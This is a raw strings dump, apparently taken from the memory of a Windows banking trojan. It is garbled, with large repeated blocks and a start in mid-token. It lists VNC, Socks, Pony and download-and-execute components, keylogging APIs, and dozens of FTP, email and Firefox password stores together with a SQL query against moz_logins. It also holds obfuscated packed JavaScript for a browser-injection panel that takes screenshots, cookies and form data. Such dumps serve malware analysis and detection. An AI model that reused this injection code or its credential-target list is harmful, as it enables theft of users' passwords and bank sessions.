i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

imapi.exe_1780_rwx_00D30000_0007B000:

.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
